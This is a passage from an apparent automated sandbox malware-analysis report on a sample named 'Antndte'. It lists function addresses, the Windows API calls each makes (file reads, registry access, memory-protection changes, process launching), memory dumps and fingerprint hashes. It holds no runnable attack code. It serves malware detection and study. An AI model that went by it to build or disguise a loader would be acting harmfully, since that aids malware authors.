                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                • Instruction ID: 087a0ba252b1651b23da729bb4e18d02a4b8a10c1fd3406c9ee2a7e33144c981
                                                                                                                                • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                • Instruction Fuzzy Hash: 96E0463221021AABCF10AF50CC04AAB3B6CFB003A0F004432B955E2050D230EA208AE9
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00405DF7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                • Instruction ID: e221de633d5b74da9fce23a9c995dc3304d5126a795d503f9c3389b6b2e666c2
                                                                                                                                • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                • Instruction Fuzzy Hash: 4DE0EC3221025AABDF10AF95DC00EEB7B6CEB05360F044436FA65E7150D631EA619BF8
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.10000981678.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001121191.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001192333.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 544645111-0
                                                                                                                                • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                                                                                                • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00402348 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PrivateProfileString
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1096422788-0
                                                                                                                                • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                                                                                • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                                                                                                • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                                                                                • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004060EF Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617D,?,00000000,?,?,Call,?), ref: 00406113
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Open
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 71445658-0
                                                                                                                                • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                • Instruction ID: 3f4f51c5761301f24834a255f16e5381e59d2a113ab40b24d84d285923e9a67b
                                                                                                                                • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                • Instruction Fuzzy Hash: 47D0173604020DBBEF119F90ED01FAB3B6DAB08314F014826FE16A80A2D776D530AB68
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00404263 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(000103CC,00000000,00000000,00000000), ref: 00404275
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
                                                                                                                                • Instruction ID: 095d2356c3d82f38ec3eb680651803a72dc2fc2a091610a0eb944f64c2fac8e0
                                                                                                                                • Opcode Fuzzy Hash: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
                                                                                                                                • Instruction Fuzzy Hash: 5CC09B717443007BDE118F609D85F0777546790741F14447D7344F51E0C774E450D61C
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0040424C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000028,?,?,00404077), ref: 0040425A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                                                                                • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                                                                                                • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                                                                                • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0040332B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FilePointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 973152223-0
                                                                                                                                • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004058AA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 004058B9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExecuteShell
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 587946157-0
                                                                                                                                • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                                                                                • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                                                                                                • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                                                                                • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00404239 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00404010), ref: 00404243
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                • Opcode ID: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
                                                                                                                                • Instruction ID: 53e6378d439adf7425634a45181eb817498d90fd80a7d40cc762234469e1412e
                                                                                                                                • Opcode Fuzzy Hash: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
                                                                                                                                • Instruction Fuzzy Hash: C5A00275544501DBCE115B50DF058057A61F7E47017514479A5555103486714461EB19
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000,0041C000,76D623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                                                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000,0041C000,76D623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                                                                                  • Part of subcall function 004052E6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,0040325E), ref: 00405341
                                                                                                                                  • Part of subcall function 004052E6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll), ref: 00405353
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                                                                                  • Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                                                                                                  • Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D
                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                                                                                                  • Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
                                                                                                                                  • Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740
                                                                                                                                  • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2972824698-0
                                                                                                                                • Opcode ID: a06172873bccc358dd9a7c93215e0fa6ef8f5ca9aba8e626b90a5e306bb7bd8f
                                                                                                                                • Instruction ID: 0c3abe8747980e4b1c062509ec269ea7acbc1ace6387f940061889d1bd78c20b
                                                                                                                                • Opcode Fuzzy Hash: a06172873bccc358dd9a7c93215e0fa6ef8f5ca9aba8e626b90a5e306bb7bd8f
                                                                                                                                • Instruction Fuzzy Hash: F5F09032905115DBCB20FFA19D848DE62A49F01368B25057FF102F61D1C77C0E459AAE
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                • Opcode ID: 8cef2f1a38d07bcfaadde647e6e80c0311f5f41b75afba5d4f2be5d43d8d1b67
                                                                                                                                • Instruction ID: 7b6d933f202abfdc9722895a59c2e384d2c5d1872e83ea8d1a096f69b0519c76
                                                                                                                                • Opcode Fuzzy Hash: 8cef2f1a38d07bcfaadde647e6e80c0311f5f41b75afba5d4f2be5d43d8d1b67
